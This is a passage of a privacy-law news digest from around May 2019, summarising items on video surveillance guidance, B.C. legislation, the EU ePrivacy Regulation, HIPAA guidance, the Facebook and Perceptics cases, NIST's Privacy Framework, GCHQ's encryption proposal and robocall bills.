  3. If so, is the invasion of privacy that results from the image-capture a proportional means of achieving this objective?

The business or organisation must ensure that the way it is used is in line with its privacy obligations. The Guide provides nine key recommendations:

  • Adopt a video surveillance policy and designate a person who will be responsible for the use of video surveillance technology;
  • Inform the public or those targeted of the presence of cameras;
  • Limit the scope of video surveillance;
  • Ensure that the images collected are secured;
  • Limit the access and use of the images collected to those that are required to achieve the stated objective;
  • Destroy the images in a secure manner once they are no longer needed to achieve the stated objective;
  • Anticipate providing access to those targeted by the surveillance;
  • For public organizations subject to the Règlement sur la diffusion, consult the relevant access to information and privacy committee; and
  • Periodically revaluate the policy and the use of video surveillance. [snIP/Its (McCaarthyTetrault)]

CA – Scrap Community Safety Act, Civil Society Groups Urge Victoria

B.C.’s government should scrap its proposed Community Safety Amendment Act (Bill 13) as it is harmful to marginalized members of society, a coalition of 15 civil liberties and advocacy groups said in a letter May 23 to Minister of Public Safety and Solicitor General Mike Farnworth. Saying they were “deeply troubled” by the legislation, which they say would allow neighbours to report suspicions about other neighbours possibly engaged in anti-social or criminal activities, triggering a process that could result in court-ordered evictions. The law would allow people to make confidential complaints to a dedicated government unit, Farnworth said April 4 as he announced the 2013 law [which was never enacted] would be revamped and enforced. He said Bill 13 will help crack down on problem properties. Civil libertarians’ assert proposed changes violate basic Canadian constitutional legal rights. “Not only does the legislation allow a person’s previous criminal convictions—no matter how long ago—to be used in court as ‘proof’ that a person is still in a criminal organization or is involved in certain activities, but it will also allow a court to draw adverse inferences about a person even in the context of someone who was found to not be criminally responsible on account of a mental disorder,” the letter said. The signatories said Bill 13 should be scrapped and the old law not enforced. The voices behind this letter have much experience—including lived experience—with protecting and enhancing the safety of the most marginalized members of our community, in particular Indigenous women and girls” said BC Civil Liberties Association lawyer Meghan McDermott. “We are all very familiar with how laws passed with the best of intentions can end up being used to hurt the very people the government sets out to support,” she said. The groups said while other jurisdictions have similar laws, such legislation has been used to target entire households in which all members are law-abiding except for one. Meenakshi Mannoe, community educator at Pivot Legal Society says “This legislation will disproportionately impact vulnerable, and often over-policed, communities which are already overrepresented in the criminal justice system, including black and Indigenous communities.” [Burnaby Now]

Consumer

WW – Shopping Habits Being Tracked Through Email

Google is tracking people’s online purchases by pulling the information from Gmail. Despite purchases being made without using Google’s apps, the company has access to years of purchase histories with receipts being sent to Gmail accounts. “To help you easily view and keep track of your purchases, bookings and subscriptions in one place, we’ve created a private destination that can only be seen by you,” a Google spokesperson said, adding that the purchase history can be deleted at a user’s discretion. However, deleting the history has proven challenging because of Google’s layered privacy settings, which do not allow a one-click solution to the deletion of the history or privatizing the information, the report states. [CNBC]

US – Users Can Now Tell Alexa to Delete Voice Recordings

According to a report, users can now delete Alexa recordings with a pair of new voice commands. Previously, users either had to go into the app or on Amazon’s website to delete recordings. For now, users are still unable to disable long-term storage of voice recordings. Amazon is currently facing some privacy concerns, the report states, particularly around recording practices for the Echo Dot Kids device. Amazon has also launched an Alexa Privacy Hub that explains how Alexa works and where to find privacy controls. [The Verge]

EU Developments

EU – Council Still Debating e-Privacy Regulation

It looks like adoption of the e-Privacy Regulation [properly named: “Regulation of the European Parliament and of the Council concerning the respect for private life and the protection of personal data in electronic communications and repealing Directive 2002/58/EC “Regulation on Privacy and Electronic Communications”] is still some time away as the three party Trilogue negotiations [wiki here] between the European Parliament, Commission and the Council have not yet started due to the Council’s inability to reach a common position. According to the Council’s note of 20 May to the delegations, some Member States have repeatedly underlined concerns about the way the e-Privacy proposal would interact with new technologies, in particular in the context of Machine-to-Machine, Internet of Things and Artificial Intelligence. The Presidency has now introduced numerous clarifications in the respective recitals, in particular 13, 20a and 21, addressing situations of multiple end-users and the question of consent. There have also been discussions on data retention and supervisory authorities with the aim of providing more flexibility for Member States, while respecting the requirements for independence. The Romanian Presidency says it has also introduced simplifications and clarifications with regard to cross-border cooperation (article 20) and the role and involvement of the European Data Protection Board (article 19). The EU Telecoms Ministers will meet on 7 June 2019, and the EU Council Presidency will move from Romania to Finland on 1 July 2019. [Privacy Laws & Business | EU Advocate General issues opinion on consent for cookies and intersection between ePrivacy-Directive and GDPR | EDPB Releases Opinion on Interplay Between the ePrivacy Directive and the GDPR and a Statement on the ePrivacy Regulation | EU Privacy Board Clarifies Overlap of Privacy Enforcement Rules | What’s the status of the draft e-Privacy Regulation?

EU – Council of the EU Releases ePrivacy Progress Report

The Romanian Presidency of the Council of the European Union has released a progress report on the proposed ePrivacy Regulation. The update includes the “state of play” in the council, including discussions in the Working Party on Telecommunications and Information Society and at the council on “concerns about the way the ePrivacy proposal would interact with new technologies,” including machine-to-machine, internet-of-things and artificial intelligence technology. In turn, the presidency has introduced clarifications in the respective recitals to address the concerns. Discussions have also included issues involving the prevention, detection and reporting of child abuse imagery, as well as how ePrivacy would interact with existing and future data retention regimes and the provisions related to supervisory authorities, each of which member states have had diverging views. [Politico]

Finance

CA – B.C. Money Laundering Response Must Uphold Privacy Interests, Privilege: Bar Association

BC Premier John Horgan announced the creation of the commission of inquiry into money laundering in British Columbia May 15 [read PR & 2 pg terms of reference], coming hot on the heels of the release of a series of reviews which found significant levels of money laundering in B.C.’s real estate market and other sectors of the economy [see 367 pg PDF German report & 184 pg PDF Maloney report]. but legal observers are raising concerns about some of the recommendations made in a recent report aimed at stemming the flow of dirty money in the province. B.C. Supreme Court Justice Austin F. Cullen has been appointed to head the inquiry. The commission will deliver an interim report within 18 months and a final report by May 2021. However, some of the recommendations in the Maloney report have raised some concern in the legal community. Recommendation 14 [at PDF pg 84], for example, suggests the B.C. minister of finance ask her federal counterpart consider incorporating legal professionals in the anti-money laundering framework by requiring them to report suspicious transactions to the appropriate law society under the Proceeds of Crime (Money Laundering) and Terrorist Financing Act. Both the Law Society of British Columbia (LSBC) and the The Federation of Law Societies (FLS), of which the Law Society of B.C. is a member believe privacy impact of recommendation 14 must be considered further … [According to LSBC president Nancy Merrill]: “The Federation of Law Societies, of which the Law Society of B.C. is a member, is currently in discussions with the federal government about potential frameworks for addressing suspicious transactions that will also respect the Supreme Court of Canada ruling on the constitutional right of Canadians to have the information that they provide to their lawyers remain confidential,” she said. Canadian Bar Association, B.C. Branch (CBABC) president Margaret Mereigh [here] said: “I think from the CBA perspective we support working collaboratively in coming up with solutions, but those actions themselves must be constitutionally sound and uphold fundamental legal principles including privacy law, privacy interests and solicitor-client privilege,” she said. Another of Maloney’s recommendations suggested the B.C. government adopt unexplained wealth orders (UWOs) in the province [Recommendation 11 – see PDF pg 81]. UWOs involve an application to a court to confiscate property if there is a discrepancy between a person’s apparent legal income and actual visible assets, and there are reasonable grounds to suspect they are involved in crime. Micheal Vonn, policy director of the B.C. Civil Liberties Association, called the idea of UWOs an “incredibly troubling notion.” And Christine Duhaime [here] of Duhaime Law said that privacy issues are attached to some of the solutions government is considering, especially with the use of information registries [see, for example, Bill C-25coverage]. “Do you really want people to know what company you own, how much you own and where you live? Now you’ll have no privacy whatsoever, so I think it could lead to more crime where people will take bigger steps in order to protect their privacy,” she said. “Did anybody talk to the privacy commissioner? I didn’t see any impact on affected groups and there should be an impact statement on what these proposals mean.” [The Lawyers Daily | ‘An incredibly troubling notion’: Drastic new tool to fight money laundering alarms civil rights advocates | Comment: Hidden costs to crackdown on dirty money]

CA – This Overhyped ‘Money Laundering’ Panic Threatens to Rob Us of Rights

Protecting privacy is a prime obsession with politicians and business. In the ongoing national policy debate over the future role of open banking, in which all financial data can be shared among institutions, the risks to personal and corporate privacy are among the greatest concerns. How strange, then, to witness the sudden political agitation in B.C. and elsewhere for governments to enact laws that would sanction massive breaches of financial privacy by mandating disclosure of the beneficial ownership of financial and real estate assets. The trigger was a report from B.C. which claimed that in 2015 criminals washed $7.4 billion through the province. Countrywide, the panel claimed the national Maytag machine processed $47 billion in criminal cash [see 184 pg PDF] The panel itself admitted the numbers are speculative. To halt this flow of allegedly illegal money they zeroed in on one key proposal: “Disclosure of beneficial ownership is the single most important measure that can be taken to combat money laundering but is regrettably under-used both internationally and in Canada.” (The italics are theirs.) Likewise a recent brief from Canada’s C.D. Howe Institute proposed radical disclosure of the real owners of all corporations, business trusts and real estate [see 12 pg PDF] in Canada [including: “…full legal name and all other names by which the registrant is commonly known, occupation, citizenships and country of tax residence.” The major flaw in the current Canadian freak out over “money laundering” is that the activity is not necessarily criminal. Hiding the ownership and origin of money and assets isn’t necessarily a crime. The ability to do so could even be for the good In fact, it is probable that much of the money (whatever the number) comes from countries — China, Russia, Venezuela — where political risks are high and corruption is prevalent. Even if it’s true that some investors here might be trying to evade oppressive taxes at home, that’s a problem for their home country, not Canada. There are also no doubt many non-criminal Canadians with their own personal reasons for secrecy. They should be protected against excessive government laws that would deprive them of the same right to privacy that our governments claim to want to protect. Non-criminal users of beneficial-ownership laws in Canada and around the world have good personal and corporate reasons for moving money around without disclosing their identities and their activities. As a society we don’t need to know what those reasons are to appreciate that people are entitled to their freedom, including the right not to be forced to reveal personal financial, business and corporate information for public consumption via the internet. Tracking down national and international criminals is the work of police and regulators, providing they don’t abuse the rights of non-criminals. Using money laundering as a scare to justify what appear to be extreme breaches of privacy takes the pursuit of crime a little too far. It’s not unlike making wiretaps of all citizens legal in order to track down a few bad guys. [Financial Post | New federal corporate rules raise privacy alarm bells | B.C. money laundering response must uphold privacy interests, privilege: bar association | ‘An incredibly troubling notion’: Drastic new tool to fight money laundering alarms civil rights advocates | Comment: Hidden costs to crackdown on dirty money

Health / Medical

US – OCR Releases New FAQs on Use of Health Apps

Building on its earlier guidance the U.S. Department of Health and Human Services Office for Civil Rights (OCR) has now released a new set of Health Insurance Portability and Accountability Act (HIPAA) FAQs which discuss the applicability of HIPAA to covered entities and business associates that interact with health apps and explain when HIPAA regulated entities may be held vicariously liable for data breaches experienced by the health app providers. They reiterate that a covered entity [see here] will not be liable for a breach of health information if the health app is not provided by or on behalf of the covered entity. Determining an app was developed for, or provided for or on behalf of a HIPAA regulated entity can be difficult given increasingly complicated business structures in the health care industry and the variety of technology solutions available in the market. For example, it is unclear how customized a technology solution must be for it to be “developed for, or provided for or on behalf of” a HIPAA regulated entity. For this reason, it is important to fully understand the relationship of the parties and the technology involved to properly analyze potential HIPAA risk exposure from using third-party technology. To read more on the new HIPAA FAQs and the potential impact on the use of third-party technology solutions [see Reed Smith’s Life Sciences Legal Update blog post here]. [Technology Law Dispatch (ReedSmith)]

US – HHS Releases Fact Sheet on Business Associates’ Liability Under HIPAA

The U.S. Department of Health and Human Services’ Office for Civil Rights released a fact sheet on the provisions a business associate can be held liable for violations of Health Insurance Portability and Accountability Act Rules. The OCR has the authority to take enforcement actions against business associates for their failure to provide breach notifications to a covered entity, impermissible use and disclosure of personal health information, failure to undertake a responsible effort to limit the amount of PHI needed for an intended task, and failure to provide compliance reports or cooperate with complaint investigations and compliance reviews. [HHS.gov]

Horror Stories

US – Facebook User Privacy Lawsuits Over Cambridge Analytica Have Legs

In San Francisco on May 29 U.S. District Judge Vince Chhabria indicated he won’t dismiss lawsuits brought on behalf of tens of millions of users who blame the Facebook for allowing their private information mined from their friends’ accounts to be shared with a British political consultancy The case is In Re Facebook Consumer Privacy User Profile Litigation, 18-MD-02843, U.S. District Court, Northern District of California (San Francisco) [see docket]. Chhabria is overseeing dozens of suits alleging users have no real control over their personal information, and that the company has repeatedly misled users to continue mining it. The suits have a long way to go before users stand a chance of claiming billions of dollars in damages. Chhabria isn’t addressing the merits of the complaints, only deciding whether the allegations are legally sufficient to proceed. The next step will be for users to seek internal information from the company to back up their claims. Users contend intrusions on their privacy have continued despite a 2011 agreement with the FTC barring the social network from extracting personal data without their knowledge. The lawsuits filed in San Francisco federal court identify one practice described as particularly deceptive: extracting information from users who adjusted their privacy settings to share information with “Friends Only” by collecting it from those friends. Chhabria signaled he’ll let the case go forward based on users’ claim that Facebook illegally disclosed their private information. Facebook is mistakenly treating its users’ expectation of privacy as a “binary,” or all-or-nothing proposition, Chhabria told the company’s lawyers. “If I don’t share a certain something with anybody, I have a full expectation of privacy,” Chhabria said. “If I share it with ten people it doesn’t eliminate my expectation of privacy. It may diminish it, but it doesn’t eliminate it.” Just because Facebook is helping users share information with each other, Chhabria added, doesn’t mean they understand they’re also taking on the risk that the company “will then turn around and disseminate it to a thousand different corporations,” Chhabria said. [Bloomberg]

US – Hackers Breach US License Plate Scanning Company

One of the US’s most widely used vehicle license plate reader (LPR) companies, Perceptics, is reportedly investigating a data breach after news site The Register was sent files stolen from it last week. The company is probably best known for designing the licence plate imaging systems used at the US border crossings with Mexico and Canada. Evidently a hacker using the identity “Boris Bullet-Dodger” claimed to have compromised the company, providing a list of 34 compressed directories amounting to hundreds of gigabytes and almost 65,000 files as evidence to The Register. Some of them look like software development directories, covering file types such as .htm, .html, .txt, .doc, .asp, .tdb, .mdb, .json, .rtf, .xls, and .tif. More concerning are the directories such as Platedatabase.rar and Plateworkbench.rar and image files the site speculates could be license plates captures. The most recent directory has a data stamp of 17 May 2019, which not only underlines how recently data appears to have been pilfered but potentially makes it more up-to-date and therefore valuable. According to The Register, Perceptics confirmed to it that some kind of data compromise had happened without offering further details. [Naked Security (Sophos)]

Identity Issues

US – Tech Companies Push Back Against ‘Age-Gate’ Proposals

Technology, media and gaming companies are pushing back against proposed rules by the U.K. Information Commissioner’s Office that would require them to create child-friendly versions of their sites. Companies could also be required to “age-gate” their websites by collecting proof of age for each user. It is unclear what the ICO will require for proof, but it is expected websites would be required to collect passports or driver’s licenses. Tech companies are concerned the proposed rules would have a financial impact on start-ups if they are required to provide multiple versions of their site, while also raising concerns that individuals would have to hand over personal data to access websites. The consultation period on the proposed rules ends soon, and the proposed regulations are expected to go to Parliament later this year. [Financial Times]

WW – Microsoft Puts Focus on Decentralized IDs

Microsoft has committed to supporting decentralized identities. Microsoft Corporate Vice President of the Identity Division Joy Chik said the tech company participates in the Decentralized Identity Foundation in order to help balance the data relationship between the individual and organizations. Chik said Microsoft has worked to include decentralized identities in its platforms in order to maintain mutual trust between the two groups. The EU General Data Protection Regulation helped show Chik that “identity is central to privacy,” adding that since organizations have more control over personal data than the individual, more work needs to be done to balance the responsibility. [Computer Weekly]

Online Privacy

CA – Canadian Anonymization Network Launched

The Canadian Anonymization Network (CANON) is an informal network, comprised of data custodians from across private, public and health sectors, whose primary purpose is to promote anonymization as a privacy-respectful means of leveraging data for innovative and beneficial purposes. Co-founded by AccessPrivacy, Privacy Analytics, Symcor and TELUS, and thanks to our other sponsors Bell, Rogers, TD and TransUnion, CANON has quickly grown to include some of the largest data custodians from private, public and health institutions across the country, all with the common goal of promoting anonymization as a means of leveraging responsible use of data for economic and socially beneficial purposes. In his announcement on Tuesday, the Minister of Innovation, Science and Economic Development (ISED) unveiled Canada’s new Digital Charter, along with proposals for modernizing the Personal Information Protection and Electronic Documents Act (PIPEDA). The document is filled with encouraging signs of support for codes of practice and industry standards. Among some of the areas the Government will be consulting on are: 1) concepts of de-identification and pseudonymization; 2) acceptable threshold of re-identification risk; 3) prohibitions against intentional re-identification; and 4) possible new governance models, such as data trusts. Today’s public launch of CANON is a timely stakeholder-led initiative to begin to collectively address many of these and related questions over the next few months. Please visit the CANON website — https://deidentify.ca/ — for more information about CANON’s objectives, deliverables, key success indicators, and membership. [Access Privacy (Osler)]

US – Personal Data Being Transmitted from Phones While Users Sleep

From his own research, Technology Columnist Geoffrey Fowler reports that 5,400 hidden data trackers were scraping data from his iPhone over the course of a week while he was sleeping. Fowler did his research with privacy firm Disconnect, which said Fowler’s phone would have transmitted 1.5 gigabytes of data during the entire month. “This is your data. Why should it even leave your phone? Why should it be collected by someone when you don’t know what they’re going to do with it?” Disconnect Chief Technology Officer Patrick Jackson said. “I know the value of data, and I don’t want mine in any hands where it doesn’t need to be.” Research also showed Fowler’s phone was reporting information such as his phone number, email address, exact location and fingerprints, while also helping trackers link to his phone. [Washington Post]

WW – Complaints Filed With Dpas Over Real-Time Bidding

Complaints have been filed with the data protection authorities of Spain, Belgium, Luxembourg and the Netherlands over the online advertising industry’s use of real-time bidding, according to an advocacy website. The complainants allege real-time bidding violates the EU General Data Protection Regulation. The new round of complaints are an extension of those filed with the DPAs in Ireland, Poland and the U.K. “We hope that this complaint sends a strong message to Google and those using Ad Tech solutions in their websites and products,” said Eticas CEO Gemma Galdon Cavell, one of the individuals who filed the complaints. “Data protection is a legal requirement must be translated into practices and technical specifications.” [Fix AdTech]

WW – Researchers Find Benefits of Behaviorally Targeted Ads Overstated

Researchers found behaviorally targeted advertising may not have a major financial impact for organizations. The study found publishers only get 4% more revenue from an ad impression that has been cookie enabled compared to one that is not. Lawmakers may look toward the value of targeted ads as they continue to shape a federal privacy law. “All of these externalities with regard to the ad economy — the harm to privacy, the expansion of government surveillance, the ability to microtarget and drive divisive content — were often justified to industry because of this ‘huge’ value to publishers,” Former U.S. Federal Trade Commission Chief Technologist Ashkan Soltani said. Meanwhile, tech and media companies continue to prepare for the implementation of the California Consumer Privacy Act. [WSJ.com]

Other Jurisdictions

WW – ICDPPC Releases May Newsletter

The International Conference of Data Protection and Privacy Commissioners published its May newsletter, highlighting its 41st conference that will take place Oct. 21 to 24 in Tirana, Albania. Albanian Information and Data Protection Commissioner Besnik Dervishi provided an update on the conference’s programming and side events. The newsletter also featured the unveiling of the ICDPPC’s commitment to secondment programs, a conversation with Ghana Data Protection Commission Executive Director Patricia Poku, and a look at the Ibero-American Data Protection Network. [ICDPPC]

Privacy (US)

US – NIST to Host Privacy Framework Workshop July 8–9

The U.S. National Institute of Standards and Technology will host its latest workshop of the development of its Privacy Framework July 8-9 in Boise, Idaho. The workshop will be held at Boise State University and is open to the public. Attendees will have the opportunity to engage in discussions to advance the framework’s development. Additional information about pre-read materials will be released closer to the date of the event. [NIST.gov]

US – NIST Continues to Make Progress on its Privacy Framework

The National Institute of Standards and Technology (NIST) development of a new Privacy Framework [FAQ] is progressing. On May 13-14, 2019, NIST hosted its second workshop [see details & docs here] on the recently released discussion draft of its “Privacy Framework: An Enterprise Risk Management Tool” [read 38 pg PDF here] NIST is expected to publish a full summary and a recording of the opening half-day of the workshop in the next couple of weeks. The workshop brought together stakeholders to provide feedback on the draft and suggest areas for revision. NIST had previously hosted a workshop in October 2018 to kick off the development of the Privacy Framework and had presented its thinking at other fora such as the Brookings Institution. [see Workshop #1 here & the coming July 2019 Workshop #3 here] There will be a webinar discussion on May 28 to follow up on the recent workshop, including an opportunity to ask questions and present feedback on the discussion draft. The discussion draft of the Privacy Framework attempts to follow the model of NIST’s Cybersecurity Framework released in 2014 [see here] The draft Privacy Framework outlines objectives for organizations to pursue that are focused around core themes. NIST’s stated intention is that organizations may choose whether to use the two frameworks together or independently of one another. The draft Privacy Framework describes five core privacy “functions” for organizations to develop and implement that track the life cycle of an organization’s management of privacy risk:

  1. Identify (organizational understanding of privacy risk);
  2. Protect (appropriate data processing safeguards);
  3. Control (data management measures);
  4. Inform (communication about data processing activities); and
  5. Respond (privacy breach mitigation and redress).

One aspect of the Privacy Framework that was commended during the recent workshop, and is not expected to undergo significant revisions, is the “Privacy Risk Management Practices” appendix [read at pg 31 of 38 pg PDF] that outlines key steps for organizations to undertake in managing privacy risk. These include organizing preparatory resources, determining privacy capabilities, conducting privacy risk assessments, and creating privacy requirements traceability. The Privacy Framework is likely to become an important resource for companies building out their compliance programs for the California Consumer Privacy Act and/or the European Union’s General Data Protection Regulation, and for companies anticipating the eventual enactment of additional federal privacy legislation. [HL Chronicle of Data Protection (Hogan Lovells) | NIST Privacy Framework Takes Shape | NIST Outlines Privacy Framework, Taking a Page from Past Cybersecurity Efforts | RSA Conference 2019: NIST’s Privacy Framework Starts to Take Shape]

WW – Study Brings Clarity to Children’s Definition of ‘Creepy’ Tech

New research from the University of Washington has offered a better sense of what children mean when they deem certain technology as “creepy.” The study was based on the responses of 11 children, ranging from ages 7 to 11, who were asked to rank various tech products as “creepy,” “not creepy” or “don’t know.” Devices that evoked thoughts of pain and/or divisiveness were most associated as creepy. The research also yielded a list of common tech properties that created fear among children and a separate list of questions for adults to ask their children regarding tech use. Meanwhile, Fast Company reports U.S. lawmakers are considering updates to the Children’s Online Privacy Protection Act that would address new risks associated with social media and internet-of-things devices. [Geekwire]

US – Lawsuit Claims iTunes Information Sold to Third Parties

A class-action federal lawsuit has been filed against Apple by customers who claim information from their iTunes purchases was sold to third parties. Three plaintiffs from Rhode Island and Michigan claim Apple mined and sold their information despite Apple’s “pro-consumer positions on issues of data privacy.” The lawsuit also claims the data collection was done in violation of their states’ privacy laws. According to Apple’s privacy policy, it only collects “non-personal information” that is not directly connected to individual users. Apple says the information is “used to help us provide more useful information to our customers and to understand which parts of our website, products and services are of most interest.” [Billboard]

Privacy Enhancing Technologies (PETs)

WW – New Privacy Tech Helps Privatize Ad Clicks

Apple’s WebKit has released new technology that allows for ad clicks to be attributable while maintaining the privacy of those clicking. The technology seeks to cut out the traditional values of ad clicking, which involves user cookies and cross-site tracking to gather information on ad performance and further ad deployment. WebKit is basing its technology off Apple’s “Privacy Preserving Ad Click Attribution,” a three-step process that allows companies to continue data collection but without scraping data and tracking those who are clicking. [Webkit]

Security

CA – Public Safety Canada Releases New Guide on Cybersecurity

Public Safety Canada (Public Safety) recently released Enhancing Canada’s Critical Infrastructure Resilience to Insider Risk [PR], a guide designed to assist Canadian organizations in developing effective programs to mitigate and respond to security threats from insiders. Critical infrastructure is broadly defined as “processes, systems, facilities, technologies, networks, assets and services essential to the health, safety, security or economic well-being of Canadians and the effective functioning of government.” Public Safety has identified the following 10 industries with critical infrastructure that requires security partnerships between governments (federal and provincial) and industry stakeholders: health, food, finance, water, information and communication technology, safety, energy and utilities, manufacturing, government, and transportation. The Guide recommends that organizations have policies, procedures and appropriate controls for organizations to create a culture of security that places responsibility on all employees. Senior management’s engagement and accountability is the cornerstone of employee buy-in. Security should be championed by a senior executive responsible for developing a security policy with support from a working group consisting of human resources, legal, privacy, communications, technology and security. It also recommends developing clear security policies through employee education, training and screening measures. These should apply to all employees, contractors and subcontractors. To reduce risks from business partners, it is recommended that organizations build long-term relationships with key service providers. Prior to entering into these relationships, risk assessments identifying security concerns regarding access to systems and data should be undertaken. Analyzing the internal security of third-party service providers, including background checks of employees and establishing third-party security agreements, is recommended. Insider risk is a danger to all organizations but can be mitigated through implementing policies and actions that emphasize employee engagement, monitoring technology usage and data movement, and having backup and recovery plans in place. The holistic approach recommended by Public Safety begins before people are granted access to critical infrastructure and continues throughout that employee’s/third-party’s time with the organization. Where cost and resources limit full implementation, administering the organization’s most critical policies would be beneficial. [Business Class (Blakes)]

Smart Cars / Cities

US – Report Highlights Privacy Risks of Smart-City Transportation Systems

Smart cities use real-time tracking to help reduce traffic congestion, as well as improve public transportation systems. However, the parallel use of facial-recognition cameras, license plate readers, mobile phone data and other technologies used to track people either on the roadways or public transportation raises privacy concerns for researchers at the International Data Corporation. In a report, “Surveillance Avenue – Urban Mobility and Addressing the Erosion of Privacy,” researchers highlight that without proper protection of personal data, that information could be misused. Researchers encourage the federal government to enact broad regulations to protect individuals’ privacy and ensure “transportation-related” data is used responsibly. [NextGov]

US – Pittsburgh City Council Mulls Smart-City Data-Sharing Agreement

Pittsburgh city council has tentatively approved a proposal that would allow two city departments to enter into agreements with “various entities” to receive data that furthers the city’s ability to deliver services to residents. The data includes traffic information from Waze and Uber that the city council says will help with infrastructure planning. The council’s lone holdout, Councilwoman Deb Gross, says the legislation, as currently written, gives wide-open authorization to city departments to enter into agreements with data companies without first requiring council approval. Council members agree more data leads to better public policy, but Gross would like to narrow the scope of the legislation before the final vote Tuesday. [Post-Gazette.com]

Surveillance

UK – Apple, Google, Microsoft, WhatsApp Sign Open Letter Condemning GCHQ Proposal to Listen in on Encrypted Chats

Under the auspices of Open Technology Institute – an international coalition of civic society organizations, security and policy experts and tech companies — including Apple, Google, Microsoft and WhatsApp — has penned a critical slap-down [see OTI PR, blog & 9 pg letter] to a surveillance proposal which would allow intelligence or law enforcement agencies to be invisibly CC’d by service providers into encrypted communications warning it would undermine trust and security and threaten fundamental rights. The proposal was made last year by the UK’s intelligence agency [GCHQ – here] In an article published last fall on the Lawfare blog, written by the National Cyber Security Centre’s (NCSC) Ian Levy and GCHQ’s Crispin Robinson (NB: the NCSC is a public facing branch of GCHQ) — which they said was intended to open a discussion about the ‘going dark’ problem which robust encryption poses for security agencies. Levy and Robinson argued that such an “exceptional access mechanism” could be baked into encrypted platforms to enable end to end encryption to be bypassed by state agencies would could instruct the platform provider to add them as a silent listener to eavesdrop on a conversation — but without the encryption protocol itself being compromised. In their letter the coalition writes “The GCHQ’s ghost protocol creates serious threats to digital security: if implemented, it will undermine the authentication process that enables users to verify that they are communicating with the right people, introduce potential unintentional vulnerabilities, and increase risks that communications systems could be abused or misused. These cybersecurity risks mean that users cannot trust that their communications are secure, as users would no longer be able to trust that they know who is on the other end of their communications, thereby posing threats to fundamental human rights, including privacy and free expression. Further, systems would be subject to new potential vulnerabilities and risks of abuse.” There are more than 50 signatories to the letter in all, and others civic society and privacy rights groups, including Human Rights Watch, Reporters Without Borders, Liberty, Privacy International and the EFF, as well as veteran security professionals such as Bruce Schneier, Philip Zimmermann and Jon Callas, and policy experts such as former FTC CTO and Whitehouse security advisor, Ashkan Soltani . [TechCrunch | Apple, Google and WhatsApp condemn UK proposal to eavesdrop on encrypted messages | Apple and WhatsApp condemn GCHQ plans to eavesdrop on encrypted chats]

WW – Amazon Working on an Emotion-Tracking Alexa Wearable

According to a Bloomberg news item, Amazon is working on a wearable wellness device said to be able to determine a user’s emotional state. This comes on the heels of patents issued for the company designed to let Alexa determine a speaker’s mood and respond accordingly based on how they’re feeling [see here & here] highlighting relevant emotions like “happiness, joy, anger, sorrow, sadness, fear, disgust, boredom and stress.” That’s a pretty wide range of reactions for a smart assistant. The smartphone-connected, wrist-worn device is said to be the product of the Alexa and Lab126 hardware team. It’s currently being tested, internally, under the code name “Dylan.” It’s worth noting that Amazon has recently been encouraging a lot of experimentation among its internal hardware team, especially when it comes to Alexa products. Among other things, that experimentation has led to the creation of Echo Buttons. Most, however, haven’t made it past the trial phase. Amazon’s tight-lipped on the matter, and the anonymous folks who’ve been discussing the device haven’t offered any info on potential time frame. All we do know for sure is that Amazon’s looking to get Alexa on as diverse an array of products as possible, and this certainly qualifies as that. [ TechCrunch | Amazon is working on a wearable that can read your emotions, report says | Amazon Is Getting Closer to Building an Alexa Wearable That Knows When You’re Depressed]

WW – Amazon Considered Letting Alexa Listen to You Without A Wake Word

A patent made public today and filed by Amazon would allow the company’s voice assistant Alexa to start recording audio before users say a “wake word” [see patent #10192546]. Its aim is to allow users to more naturally communicate with their devices, saying phrases like “Play some music, Alexa” rather than starting each command with “Alexa” or another chosen wake word. Currently, the voice assistant is unable to listen to or understand commands until the user utters the wake word. In practice, the patent would allow Alexa to “look backward” at recent things said aloud prior to hearing its name. For example, if a user said something like, “What’s the weather going to be like today, Alexa?” the device would hear the trigger word “Alexa” and quickly go back over the prior phrase to process the command. To accomplish that, the voice assistant would constantly be recording, storing and processing speech, then quickly deleting it if it is not relevant. Such a feature, if implemented, would provide considerable privacy concerns for users. The patent attempts to account for that, giving users the choice to allow Alexa to record and store audio for between 10 and 30 seconds at a time. If the patent ever were to make its way to your Alexa, the recording limit still may not be enough for some people. Amazon has already shown on several occasions that Alexa recordings aren’t as private as you may think. Recent reports revealed that Amazon employs a team of people who listen to and process Alexa recordings — and those auditors may have access to potentially personally identifiable information including location data. Amazon has also accidentally sent a user someone else’s Alexa recordings and was ordered by a court to surrender audio from a person’s smart speaker as part of an ongoing trial. [engadget]

Telecom / TV

US – Senate Passes Anti-Robocalling Bill

On May 23 a Senate bill, the Telephone Robocall Abuse Criminal Enforcement and Deterrence Act [see S.151 – TRACED Act here] aimed at fighting illegal robocalling, sailed through the US Senate with an overwhelming 97-1 vote. Now it’s headed to the House of Representatives. From there, it’s on to the desk of President Trump. Senators John Thune and Ed Markey introduced the bill in January. If the bill makes it through the House and is signed into law, it will empower the Federal Communications Commission (FCC) to inflict hefty new fines – as much as $10,000 per call – for illegal robocalls. The legislation would also increase the statute of limitations for bringing such cases, thereby giving FCC regulators more time to track down offenders. The act would also create an interagency task force to address the problem, and it would push carriers like AT&T and Verizon to deploy call authentication systems, such as the pending STIR/SHAKEN call identification protocols [here], into their networks. In February 2019, FCC Chairman Ajit Pai reiterated his call for a robust caller ID authentication system to be implemented this year. Earlier this month, Pai announced a new FCC initiative to fight illegal robocalls that would assure carriers that they’re able to automatically register customers for call-blocking service. At this point, customers have to do it themselves. The proposed rule will be taken up for a vote next month. Not to be outdone, the House, however, is working on its own bill, the Stopping Bad Robocalls Act (HR 946) [read here], which was introduced by Rep. Frank Pallone Jr., the chairman of the Energy and Commerce Committee. [Naked Security (Sophos) | Senate passes anti-robocall bill]

US – U.S. Senate Intelligence Committee Urges Canada to Ban Huawei from 5G

